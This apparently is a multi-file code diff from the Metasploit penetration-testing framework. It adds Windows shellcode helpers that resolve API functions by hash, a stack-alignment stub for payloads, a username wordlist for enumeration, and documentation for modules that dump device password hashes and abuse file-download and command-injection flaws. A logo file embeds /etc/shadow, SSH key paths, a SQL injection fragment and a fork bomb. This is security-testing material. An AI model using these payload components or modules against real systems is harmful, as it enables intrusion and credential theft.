+  DWORD nNumberOfBytesToWrite,
+  LPDWORD lpNumberOfBytesWritten,
+  LPOVERLAPPED lpOverlapped
+);
+
+typedef BOOL (WINAPI *FuncPeekNamedPipe)
+(
+  HANDLE hNamedPipe,
+  LPVOID lpBuffer,
+  DWORD nBufferSize,
+  LPDWORD nBytesRead,
+  LPDWORD lpTotalBytesAvailable,
+  LPDWORD lpBytesLeftThisMessage
+);
+
+typedef BOOL (WINAPI *FuncCreatePipe)
+(
+  PHANDLE hReadPipe,
+  PHANDLE hWritePipe,
+  LPSECURITY_ATTRIBUTES lpPipeAttributes,
+  DWORD nSize
+);
+
+typedef BOOL (WINAPI *FuncCloseHandle)
+(
+  HANDLE hObject
+);
+
+typedef HGLOBAL (WINAPI *FuncGlobalAlloc)
+(
+  UINT uFlags,
+  SIZE_T dwBytes
+);
+
+typedef HGLOBAL (WINAPI *FuncGlobalFree)
+(
+  HGLOBAL hMem
+);
+
+typedef HANDLE (WINAPI *FuncHeapCreate)
+(
+  DWORD flOptions,
+  SIZE_T dwInitialize,
+  SIZE_T dwMaximumSize
+);
+
+typedef LPVOID (WINAPI *FuncHeapAlloc)
+(
+  HANDLE hHeap,
+  DWORD dwFlags,
+  SIZE_T dwBytes
+);
+
+typedef VOID (WINAPI *FuncSleep)
+(
+  DWORD dwMilliseconds
+);
+
+typedef HANDLE (WINAPI *FuncGetCurrentProcess) ();
+
+typedef BOOL (WINAPI *FuncGetExitCodeProcess)
+(
+  HANDLE hProcess,
+  LPDWORD lpExitCode
+);
+
+typedef VOID (WINAPI *FuncExitProcess)
+(
+  UINT uExitCode
+);
+
+typedef BOOL (WINAPI *FuncCloseHandle)
+(
+  HANDLE hObject
+);
+
+typedef BOOL (WINAPI *FuncVirtualProtect)
+(
+  LPVOID lpAddress,
+  SIZE_T dwSize,
+  DWORD flNewProtect,
+  PDWORD lpflOldProtect
+);
+
+typedef LPVOID (WINAPI *FuncVirtualAlloc)
+(
+  LPVOID lpAddress,
+  SIZE_T dwSize,
+  DWORD flAllocationType,
+  DWORD flProtect
+);
+
+typedef BOOL (WINAPI *FuncVirtualFree)
+(
+  LPVOID lpAddress,
+  SIZE_T dwSize,
+  DWORD dwFreeType
+);
+
+#endif

data/headers/windows/c_payload_util/payload_util.h

@@ -0,0 +1,152 @@
+/*
+ * This code is provided under the 3-clause BSD license below.
+ * ***********************************************************
+ *
+ * Copyright (c) 2013, Matthew Graeber
+ * All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without modification, are permitted provided that the following conditions are met:
+ *
+ *   Redistributions of source code must retain the above copyright notice, this list of conditions and the following disclaimer.
+ *   Redistributions in binary form must reproduce the above copyright notice, this list of conditions and the following disclaimer in the documentation and/or other materials provided with the distribution.
+ *   The names of its contributors may not be used to endorse or promote products derived from this software without specific prior written permission.
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
+*/
+
+#ifndef _PAYLOAD_UTIL
+#define _PAYLOAD_UTIL
+
+#include <windows.h>
+#include <winternl.h>
+
+typedef HMODULE (WINAPI *FuncLoadLibraryA) (
+	LPTSTR lpFileName
+);
+
+// This compiles to a ROR instruction
+// This is needed because _lrotr() is an external reference
+// Also, there is not a consistent compiler intrinsic to accomplish this across all three platforms.
+#define ROTR32(value, shift)	(((DWORD) value >> (BYTE) shift) | ((DWORD) value << (32 - (BYTE) shift)))
+
+// Redefine PEB structures. The structure definitions in winternl.h are incomplete.
+typedef struct _MY_PEB_LDR_DATA {
+  ULONG Length;
+	BOOL Initialized;
+	PVOID SsHandle;
+	LIST_ENTRY InLoadOrderModuleList;
+  LIST_ENTRY InMemoryOrderModuleList;
+	LIST_ENTRY InInitializationOrderModuleList;
+} MY_PEB_LDR_DATA, *PMY_PEB_LDR_DATA;
+
+typedef struct _MY_LDR_DATA_TABLE_ENTRY
+{
+	LIST_ENTRY InLoadOrderLinks;
+	LIST_ENTRY InMemoryOrderLinks;
+	LIST_ENTRY InInitializationOrderLinks;
+	PVOID DllBase;
+	PVOID EntryPoint;
+	ULONG SizeOfImage;
+	UNICODE_STRING FullDllName;
+	UNICODE_STRING BaseDllName;
+} MY_LDR_DATA_TABLE_ENTRY, *PMY_LDR_DATA_TABLE_ENTRY;
+
+HMODULE GetProcAddressWithHash( _In_ DWORD dwModuleFunctionHash )
+{
+	PPEB PebAddress;
+	PMY_PEB_LDR_DATA pLdr;
+	PMY_LDR_DATA_TABLE_ENTRY pDataTableEntry;
+	PVOID pModuleBase;
+	PIMAGE_NT_HEADERS pNTHeader;
+	DWORD dwExportDirRVA;
+	PIMAGE_EXPORT_DIRECTORY pExportDir;
+	PLIST_ENTRY pNextModule;
+	DWORD dwNumFunctions;
+	USHORT usOrdinalTableIndex;
+	PDWORD pdwFunctionNameBase;
+	PCSTR pFunctionName;
+	UNICODE_STRING BaseDllName;
+	DWORD dwModuleHash;
+	DWORD dwFunctionHash;
+	PCSTR pTempChar;
+	DWORD i;
+
+#if defined(_WIN64)
+	PebAddress = (PPEB) __readgsqword( 0x60 );
+#else
+	PebAddress = (PPEB) __readfsdword( 0x30 );
+#endif
+
+	pLdr = (PMY_PEB_LDR_DATA) PebAddress->Ldr;
+	pNextModule = pLdr->InLoadOrderModuleList.Flink;
+	pDataTableEntry = (PMY_LDR_DATA_TABLE_ENTRY) pNextModule;
+
+	while (pDataTableEntry->DllBase != NULL)
+	{
+		dwModuleHash = 0;
+		pModuleBase = pDataTableEntry->DllBase;
+		BaseDllName = pDataTableEntry->BaseDllName;
+		pNTHeader = (PIMAGE_NT_HEADERS) ((ULONG_PTR) pModuleBase + ((PIMAGE_DOS_HEADER) pModuleBase)->e_lfanew);
+		dwExportDirRVA = pNTHeader->OptionalHeader.DataDirectory[0].VirtualAddress;
+
+		// Get the next loaded module entry
+		pDataTableEntry = (PMY_LDR_DATA_TABLE_ENTRY) pDataTableEntry->InLoadOrderLinks.Flink;
+
+		// If the current module does not export any functions, move on to the next module.
+		if (dwExportDirRVA == 0)
+		{
+			continue;
+		}
+
+		// Calculate the module hash
+		for (i = 0; i < BaseDllName.MaximumLength; i++)
+		{
+			pTempChar = ((PCSTR) BaseDllName.Buffer + i);
+
+			dwModuleHash = ROTR32( dwModuleHash, 13 );
+
+			if ( *pTempChar >= 0x61 )
+			{
+				dwModuleHash += *pTempChar - 0x20;
+			}
+			else
+			{
+				dwModuleHash += *pTempChar;
+			}
+		}
+
+		pExportDir = (PIMAGE_EXPORT_DIRECTORY) ((ULONG_PTR) pModuleBase + dwExportDirRVA);
+
+		dwNumFunctions = pExportDir->NumberOfNames;
+		pdwFunctionNameBase = (PDWORD) ((PCHAR) pModuleBase + pExportDir->AddressOfNames);
+
+		for (i = 0; i < dwNumFunctions; i++)
+		{
+			dwFunctionHash = 0;
+			pFunctionName = (PCSTR) (*pdwFunctionNameBase + (ULONG_PTR) pModuleBase);
+			pdwFunctionNameBase++;
+
+			pTempChar = pFunctionName;
+
+			do
+			{
+				dwFunctionHash = ROTR32( dwFunctionHash, 13 );
+				dwFunctionHash += *pTempChar;
+				pTempChar++;
+			} while (*(pTempChar - 1) != 0);
+
+			dwFunctionHash += dwModuleHash;
+
+			if (dwFunctionHash == dwModuleFunctionHash)
+			{
+				usOrdinalTableIndex = *(PUSHORT)(((ULONG_PTR) pModuleBase + pExportDir->AddressOfNameOrdinals) + (2 * i));
+				return (HMODULE) ((ULONG_PTR) pModuleBase + *(PDWORD)(((ULONG_PTR) pModuleBase + pExportDir->AddressOfFunctions) + (4 * usOrdinalTableIndex)));
+			}
+		}
+	}
+
+	// All modules have been exhausted and the function was not found.
+	return NULL;
+}
+
+#endif

data/headers/windows/c_payload_util/winsock_util.h

@@ -0,0 +1,64 @@
+#ifndef _WINSOCK_UTIL
+#define _WINSOCK_UTIL
+
+#define WIN32_LEAN_AND_MEAN
+
+#include <windows.h>
+#include <winsock2.h>
+#include <intrin.h>
+#include <ws2tcpip.h>
+
+typedef int (WINAPI *FuncWSAStartup)
+(
+  WORD wVersionRequired,
+  LPWSADATA lpWSAData
+);
+
+typedef int (WINAPI *FuncWSACleanup) ();
+
+typedef int (WINAPI *FuncGetAddrInfo)
+(
+  PCSTR pNodeName,
+  PCSTR pServiceName,
+  const ADDRINFO *pHints,
+  LPADDRINFO *ppResult
+);
+
+typedef void (WINAPI *FuncFreeAddrInfo)
+(
+  LPADDRINFO pAddrInfo
+);
+
+typedef SOCKET (WINAPI *FuncWSASocketA) (
+	int af,
+	int type,
+	int protocol,
+	LPWSAPROTOCOL_INFO lpProtocolInfo,
+	GROUP g,
+	DWORD dwFlags
+);
+
+typedef int (WINAPI *FuncConnect)
+(
+  SOCKET s,
+  const struct sockaddr *name,
+  int namelen
+);
+
+typedef int (WINAPI *FuncSend)
+(
+  SOCKET s,
+  const char *buf,
+  int len,
+  int flags
+);
+
+typedef int (WINAPI *FuncRecv)
+(
+  SOCKET s,
+  char *buf,
+  int len,
+  int flags
+);
+
+#endif

data/logos/haKCers.txt

@@ -0,0 +1,33 @@
+                                              `:oDFo:`                            
+                                           ./ymM0dayMmy/.                          
+                                        -+dHJ5aGFyZGVyIQ==+-                    
+                                    `:sm⏣~~Destroy.No.Data~~s:`                
+                                 -+h2~~Maintain.No.Persistence~~h+-              
+                             `:odNo2~~Above.All.Else.Do.No.Harm~~Ndo:`          
+                          ./etc/shadow.0days-Data'%20OR%201=1--.No.0MN8'/.      
+                       -++SecKCoin++e.AMd`       `.-://///+hbove.913.ElsMNh+-    
+                      -~/.ssh/id_rsa.Des-                  `htN01UserWroteMe!-  
+                      :dopeAW.No<nano>o                     :is:TЯiKC.sudo-.A:  
+                      :we're.all.alike'`                     The.PFYroy.No.D7:  
+                      :PLACEDRINKHERE!:                      yxp_cmdshell.Ab0:    
+                      :msf>exploit -j.                       :Ns.BOB&ALICEes7:    
+                      :---srwxrwx:-.`                        `MS146.52.No.Per:    
+                      :<script>.Ac816/                        sENbove3101.404:    
+                      :NT_AUTHORITY.Do                        `T:/shSYSTEM-.N:    
+                      :09.14.2011.raid                       /STFU|wall.No.Pr:    
+                      :hevnsntSurb025N.                      dNVRGOING2GIVUUP:    
+                      :#OUTHOUSE-  -s:                       /corykennedyData:    
+                      :$nmap -oS                              SSo.6178306Ence:    
+                      :Awsm.da:                            /shMTl#beats3o.No.:    
+                      :Ring0:                             `dDestRoyREXKC3ta/M:    
+                      :23d:                               sSETEC.ASTRONOMYist:    
+                       /-                        /yo-    .ence.N:(){ :|: & };:    
+                                                 `:Shall.We.Play.A.Game?tron/    
+                                                 ```-ooy.if1ghtf0r+ehUser5`    
+                                               ..th3.H1V3.U2VjRFNN.jMh+.`          
+                                              `MjM~~WE.ARE.se~~MMjMs              
+                                               +~KANSAS.CITY's~-`                  
+                                                J~HAKCERS~./.`                    
+                                                .esc:wq!:`                        
+                                                 +++ATH`                            
+                                                  `

data/logos/honk.txt

@@ -0,0 +1,22 @@
+%clr                                   ___          ____
+                               ,-""   `.%yel      %whi< HONK >
+                             ,'  _   e %yel)`-._%whi /  ----
+                            /  ,' `-._%yel<.===-'%whi
+                           /  /
+                          /  ;
+              _          /   ;
+ (`._    _.-"" ""--..__,'    |
+ <_  `-""                     \
+  <`-                          :
+   (__   <__.                  ;
+     `-.   '-.__.      _.'    /
+        \      `-.__,-'    _,'
+         `._    ,    /__,-'
+            ""._\__,'%yel< <____%whi
+                 %yel| |  `----.`.
+%whi                 %yel| |        \ `.
+%whi                 %yel; |___      \-``
+%whi                 %yel\   --<
+%whi                  %yel`.`.<
+%whi                    %yel`-'
+%whi

data/logos/null-pointer-deref.txt

@@ -31,7 +31,7 @@ Stack: 90909090990909090990909090
        ffffffff..................
 %clr
 
-%yelCode: 00 00 00 00 M3 T4 SP L0 1T FR 4M 3W OR K! V3 R5 I0 N4 00 00 00 00%clr
+%yelCode: 00 00 00 00 M3 T4 SP L0 1T FR 4M 3W OR K! V3 R5 I0 N5 00 00 00 00%clr
 Aiee, Killing Interrupt handler
 %redKernel panic: Attempted to kill the idle task!
 In swapper task - not syncing%clr

data/markdown_doc/auxiliary_scanner_template.erb

@@ -25,5 +25,5 @@ msf <%= mod.type %>(<%= mod.shortname %>) > set RHOSTS 192.168.1.1/24
 Example 3:
 
 ```
-msf <%= mod.type %>(<%= mod.shortname %>) > set RHOSTS file:///tmp/ip_list.txt
+msf <%= mod.type %>(<%= mod.shortname %>) > set RHOSTS file:/tmp/ip_list.txt
 ```

data/utilities/encrypted_payload/AdjustStack.asm

@@ -0,0 +1,48 @@
+/*
+ * This code is provided under the 3-clause BSD license below.
+ * ***********************************************************
+ *
+ * Copyright (c) 2013, Matthew Graeber
+ * All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without modification, are permitted provided that the following conditions are met:
+ *
+ *   Redistributions of source code must retain the above copyright notice, this list of conditions and the following disclaimer.
+ *   Redistributions in binary form must reproduce the above copyright notice, this list of conditions and the following disclaimer in the documentation and/or other materials provided with the distribution.
+ *   The names of its contributors may not be used to endorse or promote products derived from this software without specific prior written permission.
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
+*/
+
+; Author:       Matthew Graeber (@mattifestation)
+; License:      BSD 3-Clause
+; Syntax:       MASM
+; Build Syntax: ml64 /c /Cx AdjustStack.asm
+; Output:       AdjustStack.obj
+; Notes: I really wanted to avoid having this external dependency but I couldnt
+; come up with any other way to guarantee 16-byte stack alignment in 64-bit
+; shellcode written in C.
+
+extern	ExecutePayload
+global  AlignRSP			; Marking AlignRSP as PUBLIC allows for the function
+							; to be called as an extern in our C code.
+
+segment .text
+
+; AlignRSP is a simple call stub that ensures that the stack is 16-byte aligned prior
+; to calling the entry point of the payload. This is necessary because 64-bit functions
+; in Windows assume that they were called with 16-byte stack alignment. When amd64
+; shellcode is executed, you cant be assured that you stack is 16-byte aligned. For example,
+; if your shellcode lands with 8-byte stack alignment, any call to a Win32 function will likely
+; crash upon calling any ASM instruction that utilizes XMM registers (which require 16-byte)
+; alignment.
+
+AlignRSP:
+	push	rsi						; Preserve RSI since were stomping on it
+	mov		rsi, rsp				; Save the value of RSP so it can be restored
+	and		rsp, 0FFFFFFFFFFFFFFF0h	; Align RSP to 16 bytes
+	sub		rsp, 020h				; Allocate homing space for ExecutePayload
+	call	ExecutePayload			; Call the entry point of the payload
+	mov		rsp, rsi				; Restore the original value of RSP
+	pop		rsi						; Restore RSI
+	ret								; Return to caller

data/utilities/encrypted_payload/func_order.ld

@@ -0,0 +1,9 @@
+ENTRY(_ExecutePayload)
+SECTIONS
+{
+	.text :
+	{
+		*(.text.ExecutePayload)
+	}
+
+}

data/utilities/encrypted_payload/func_order64.ld

@@ -0,0 +1,11 @@
+ENTRY(AlignRSP)
+SECTIONS
+{
+	.text :
+	{
+    *(.text.AlignRSP)
+		*(.text.ExecutePayload)
+		*(.text.GetProcAddressWithHash)
+	}
+
+}

data/wordlists/unix_users.txt

@@ -1,88 +1,131 @@
 
 4Dgifts
-EZsetup
-OutOfBox
-ROOT
+abrt
 adm
 admin
 administrator
 anon
+_apt
+arpwatch
 auditor
 avahi
 avahi-autoipd
 backup
 bbs
+beef-xss
 bin
+bitnami
 checkfs
 checkfsys
 checksys
 chronos
+chrony
 cmwlogin
+cockpit-ws
+colord
 couchdb
+cups-pk-helper
 daemon
 dbadmin
+dbus
+Debian-exim
+Debian-snmp
 demo
 demos
 diag
 distccd
 dni
+dnsmasq
+dradis
+EZsetup
 fal
 fax
 ftp
 games
 gdm
+geoclue
 gnats
+gnome-initial-setup
 gopher
 gropher
 guest
 haldaemon
 halt
 hplip
+inetsim
 informix
 install
+iodine
 irc
+jet
 karaf
 kernoops
+king-phisher
+landscape
+libstoragemgmt
 libuuid
+lightdm
 list
 listen
 lp
 lpadm
 lpadmin
+lxd
 lynx
 mail
 man
 me
 messagebus
+miredo
 mountfs
 mountfsys
 mountsys
+mysql
 news
 noaccess
 nobody
 nobody4
+ntp
 nuucp
+nxautomation
 nxpgsql
+omi
+omsagent
 operator
 oracle
+OutOfBox
 pi
+polkitd
+pollinate
 popr
+postfix
 postgres
 postmaster
 printer
 proxy
 pulse
+redsocks
 rfindd
 rje
 root
+ROOT
 rooty
+rpc
+rpcuser
+rtkit
+rwhod
 saned
 service
+setroubleshoot
 setup
 sgiweb
+shutdown
 sigver
 speech-dispatcher
 sshd
+sslh
+sssd
+stunnel4
 sym
 symop
 sync
@@ -92,22 +135,34 @@ sysadmin
 sysbin
 syslog
 system_admin
+systemd-bus-proxy
+systemd-coredump
+systemd-network
+systemd-resolve
+systemd-timesync
+tcpdump
 trouble
+tss
 udadmin
 ultra
 umountfs
 umountfsys
 umountsys
 unix
+unscd
 us_admin
+usbmux
 user
 uucp
 uucpadm
+uuidd
+vagrant
+varnish
 web
 webmaster
+whoopsie
 www
 www-data
 xpdb
 xpopr
 zabbix
-vagrant

documentation/modules/auxiliary/admin/brocade/brocade_config.md

@@ -0,0 +1,50 @@
+## General Notes
+
+This module imports a Brocade configuration file into the database.
+This is similar to `post/brocade/gather/enum_brocade` only access isn't required,
+and assumes you already have the file.
+
+Example files for import can be found on git, like [this](https://raw.githubusercontent.com/h00die/MSF-Testing-Scripts/master/brocade_08.0.30hT311_ic_icx6430.conf).
+
+## Verification Steps
+
+1. Have a Brocade configuration file
+2. Start `msfconsole`
+3. `use auxiliary/admin/brocade/brocade_config`
+4. `set RHOST x.x.x.x`
+5. `set CONFIG /tmp/file.config`
+6. `run`
+
+## Options
+
+  **RHOST**
+
+  Needed for setting services and items to.  This is relatively arbitrary.
+
+  **CONFIG**
+
+  File path to the configuration file.
+
+## Scenarios
+
+```
+msf5 > wget https://raw.githubusercontent.com/h00die/MSF-Testing-Scripts/master/brocade_08.0.30hT311_ic_icx6430.conf -o /dev/null -O /tmp/brocade.conf
+msf5 > use auxiliary/admin/brocade/brocade_config
+msf5 auxiliary(admin/brocade/brocade_config) > set rhosts 127.0.0.1
+rhosts => 127.0.0.1
+msf5 auxiliary(admin/brocade/brocade_config) > set config /tmp/brocade.conf
+config => /tmp/brocade.conf
+msf5 auxiliary(admin/brocade/brocade_config) > run
+[*] Running module against 127.0.0.1
+
+[*] Importing config
+[+] password-display is enabled, hashes will be displayed in config
+[+] enable password hash $1$QP3H93Wm$uxYAs2HmAK0lQiP3ig5tm.
+[+] User brocade of type 8 found with password hash $1$f/uxhovU$dST5lNskZCPQe/5QijULi0.
+[+] ENCRYPTED SNMP community $MlVzZCFAbg== with permissions ro
+[+] ENCRYPTED SNMP community $U2kyXj1k with permissions rw
+[+] Config import successful
+[*] Auxiliary module execution completed
+```
+
+

documentation/modules/auxiliary/admin/cisco/cisco_asa_extrabacon.md

@@ -56,7 +56,7 @@ All of the leaked versions are available in the module
 
 `**` We currently can't distinguish between normal and NPE versions from the SNMP strings. We've commented out the NPE offsets, as NPE is very rare (it is for exporting to places where encryption is crappy), but in the future, we'd like to incorporate these versions. Perhaps as a bool option?
 
-## Verification
+## Verification Steps
 
 - Start `msfconsole`
 - `use auxiliary/admin/cisco/cisco_asa_extrabacon`

documentation/modules/auxiliary/admin/cisco/cisco_config.md

@@ -0,0 +1,51 @@
+## General Notes
+
+This module imports a Cisco configuration file into the database.
+This is similar to `post/cisco/gather/enum_cisco` only access isn't required,
+and assumes you already have the file.
+
+Example files for import can be found on git, like [this](https://raw.githubusercontent.com/GaetanLongree/MASI-ProjetAvanceReseau/3cf1d9a93828d5f44ee1bc4e4c01411e416892c5/Los%20Angeles/LA_EDGE_D.txt)
+or from [Cisco](https://www.cisco.com/en/US/docs/routers/access/800/850/software/configuration/guide/sampconf.html).
+
+## Verification Steps
+
+1. Have a Cisco configuration file
+2. Start `msfconsole`
+3. `use auxiliary/admin/cisco/cisco_config`
+4. `set RHOST x.x.x.x`
+5. `set CONFIG /tmp/file.config`
+6. `run`
+
+## Options
+
+  **RHOST**
+
+  Needed for setting services and items to.  This is relatively arbitrary.
+
+  **CONFIG**
+
+  File path to the configuration file.
+
+## Scenarios
+
+```
+root@metasploit-dev:~/metasploit-framework# wget https://raw.githubusercontent.com/GaetanLongree/MASI-ProjetAvanceReseau/3cf1d9a93828d5f44ee1bc4e4c01411e416892c5/Los%20Angeles/LA_EDGE_D.txt -O /tmp/LA_EDGE_D.txt -o /dev/null
+
+root@metasploit-dev:~/metasploit-framework# ./msfconsole 
+
+[*] Starting persistent handler(s)...
+msf5 > use auxiliary/admin/cisco/cisco_config 
+msf5 auxiliary(admin/cisco/cisco_config) > set config /tmp/LA_EDGE_D.txt
+config => /tmp/LA_EDGE_D.txt
+msf5 auxiliary(admin/cisco/cisco_config) > set rhost 127.0.0.1
+rhost => 127.0.0.1
+msf5 auxiliary(admin/cisco/cisco_config) > run
+[*] Running module against 127.0.0.1
+
+[*] Importing config
+[+] 127.0.0.1:22 MD5 Encrypted Enable Password: $1$mERr$DWwx4W/5HXD2oail62IeB1
+[+] 127.0.0.1:22 Username 'Waldo' with MD5 Encrypted Password: $1$mERr$DWwx4W/5HXD2oail62IeB1
+[+] Config import successful
+[*] Auxiliary module execution completed
+```
+

documentation/modules/auxiliary/admin/cisco/cisco_dcnm_download.md

@@ -1,4 +1,4 @@
-## Intro
+## Vulnerable Application
 
 Cisco Data Center Network Manager exposes a servlet to download files on /fm/downloadServlet.
 An authenticated user can abuse this servlet to download arbitrary files as root by specifying
@@ -8,21 +8,7 @@ This module was tested on the DCNM Linux virtual appliance 10.4(2), 11.0(1) and
 work on a few versions below 10.4(2). Only version 11.0(1) requires authentication to exploit
 (see References to understand why), on the other versions it abuses CVE-2019-1619 to bypass authentication.
 
-
-## Author and discoverer
-
-Pedro Ribeiro (pedrib@gmail.com) from Agile Information Security
-
-
-## References
-
-https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190626-dcnm-bypass
-https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190626-dcnm-file-dwnld
-https://raw.githubusercontent.com/pedrib/PoC/master/exploits/metasploit/cisco_dcnm_download.rb
-https://seclists.org/fulldisclosure/2019/Jul/7
-
-
-## Usage
+## Scenarios
 
 Setup RHOST, pick the file to download (FILENAME, default is /etc/shadow) and enjoy!
 

documentation/modules/auxiliary/admin/http/cnpilot_r_cmd_exec.md

@@ -8,7 +8,7 @@ Cambium cnPilot r200/r201 device software versions 4.2.3-R4 and newer, contain a
 4. Do: ```set CMD [command]```
 5. Do: ```run```
 
-## Sample Output
+## Scenarios
 
   ```
 msf > use auxiliary/scanner/http/cnpilot_r_cmd_exec

documentation/modules/auxiliary/admin/http/cnpilot_r_fpt.md

@@ -1,3 +1,5 @@
+## Vulnerable Application
+
 This module exploits a File Path Traversal vulnerability in Cambium cnPilot r200/r201 devices to read arbitrary files off the file system. Affected versions - 4.3.3-R4 and prior.
 
 ## Verification Steps
@@ -8,7 +10,7 @@ This module exploits a File Path Traversal vulnerability in Cambium cnPilot r200
 4. Do: ```set FILENAME [filename]```
 5. Do: ```run```
 
-## Sample Output
+## Scenarios
 
   ```
 msf > use auxiliary/scanner/http/cnpilot_r_fpt

documentation/modules/auxiliary/admin/http/epmp1000_get_chart_cmd_exec.md

@@ -8,7 +8,7 @@ This module exploits an OS Command Injection vulnerability in Cambium ePMP 1000
 4. Do: ```set CMD [COMMAND]```
 5. Do: ```run```
 
-## Sample Output
+## Scenarios
 
   ```
 msf > use auxiliary/scanner/http/epmp1000_get_chart_cmd_exec

documentation/modules/auxiliary/admin/http/epmp1000_reset_pass.md

@@ -9,7 +9,7 @@ This module exploits an access control vulnerability in Cambium ePMP device mana
 5. Do: ```set NEW_PASSWORD newpass```
 6. Do: ```run```
 
-## Sample Output
+## Scenarios
 
   ```
 msf > use use auxiliary/scanner/http/epmp1000_reset_pass

documentation/modules/auxiliary/admin/http/supra_smart_cloud_tv_rfi.md

@@ -15,7 +15,7 @@ attacker on the local network can send a crafted request to broadcast a fake vid
 
 Doo-doodoodoodoodoo-doo, Epic Sax Guy will be broadcasted to the remote system.
 
-## Sample Output
+## Scenarios
 
 ```
 msf5 > use auxiliary/admin/http/supra_smart_cloud_tv_rfi 

documentation/modules/auxiliary/admin/juniper/juniper_config.md

@@ -0,0 +1,91 @@
+## General Notes
+
+This module imports a Juniper configuration file into the database.
+This is similar to `post/juniper/gather/enum_juniper` only access isn't required,
+and assumes you already have the file.
+
+Example files for import can be found on git, like [this (junos)](https://raw.githubusercontent.com/h00die/MSF-Testing-Scripts/master/juniper_ex2200.config)
+or [this (screenos)](https://raw.githubusercontent.com/h00die/MSF-Testing-Scripts/master/juniper_ssg5_screenos.conf).
+
+## Verification Steps
+
+1. Have a Juniper configuration file
+2. Start `msfconsole`
+3. `use auxiliary/admin/juniper/juniper_config`
+4. `set RHOST x.x.x.x`
+5. `set CONFIG /tmp/file.config`
+6. `set action junos`
+7. `run`
+
+## Options
+
+  **RHOST**
+
+  Needed for setting services and items to.  This is relatively arbitrary.
+
+  **CONFIG**
+
+  File path to the configuration file.
+
+  **Action**
+
+  `JUNOS` for JunOS config file, and `SCREENOS` for ScreenOS config file.
+
+## Scenarios
+
+### JunOS
+
+```
+root@metasploit-dev:~/metasploit-framework# wget -o /dev/null -O /tmp/juniper_ex2200.config https://raw.githubusercontent.com/h00die/MSF-Testing-Scripts/master/juniper_ex2200.config
+root@metasploit-dev:~/metasploit-framework# ./msfconsole 
+
+[*] Starting persistent handler(s)...
+msf5 > use auxiliary/admin/juniper/gather/juniper_config
+msf5 auxiliary(admin/juniper/gather/juniper_config) > set config /tmp/juniper_ex2200.config
+config => /tmp/juniper_ex2200.config
+msf5 auxiliary(admin/juniper/gather/juniper_config) > set rhost 127.0.0.1
+rhost => 127.0.0.1
+msf5 auxiliary(admin/juniper/gather/juniper_config) > run
+[*] Running module against 127.0.0.1
+
+[*] Importing config
+[+] root password hash: $1$pz9b1.fq$foo5r85Ql8mXdoRUe0C1E.
+[+] User 2000 named newuser in group super-user found with password hash $1$rm8FaMFY$k4LFxqsVAiGO5tKqyO9jJ/.
+[+] User 2002 named newuser2 in group operator found with password hash $1$aDZi44AP$bQGGjqPJ.F.Cm5QvX2yaa0.
+[+] User 2003 named newuser3 in group read-only found with password hash $1$1.YvKzUY$dcAj99KngGhFZTpxGjA93..
+[+] User 2004 named newuser4 in group unauthorized found with password hash $1$bdWYaqOE$z6oTSJS3p1R8CoNaos9Ce/.
+[+] SNMP community read with permissions read-only
+[+] SNMP community public with permissions read-only
+[+] SNMP community private with permissions read-write
+[+] SNMP community secretsauce with permissions read-write
+[+] SNMP community hello there with permissions read-write
+[+] radius server 1.1.1.1 password hash: $9$Y-4GikqfF39JGCu1Ileq.PQ6AB1hrlMBIyKvWdV
+[+] PPTP username 'pap_username' hash $9$he4revM87-dsevm5TQCAp0BErvLxd4JDNdkPfT/9BIR via PAP
+[+] Config import successful
+[*] Auxiliary module execution completed
+```
+
+### ScreenOS
+
+```
+root@metasploit-dev:~/metasploit-framework# wget -o /dev/null -O /tmp/screenos.conf https://raw.githubusercontent.com/h00die/MSF-Testing-Scripts/master/juniper_ssg5_screenos.conf
+root@metasploit-dev:~/metasploit-framework# ./msfconsole 
+
+[*] Starting persistent handler(s)...
+msf5 > use auxiliary/admin/juniper/gather/juniper_config
+msf5 auxiliary(admin/juniper/gather/juniper_config) > set config /tmp/screenos.conf
+config => /tmp/screenos.conf
+msf5 auxiliary(admin/juniper/gather/juniper_config) > set rhost 127.0.0.1
+rhost => 127.0.0.1
+msf5 auxiliary(admin/juniper/gather/juniper_config) > set action SCREENOS
+action => SCREENOS
+msf5 auxiliary(admin/juniper/gather/juniper_config) > run
+[*] Running module against 127.0.0.1
+
+[*] Importing config
+[+] Admin user netscreen found with password hash nKVUM2rwMUzPcrkG5sWIHdCtqkAibn
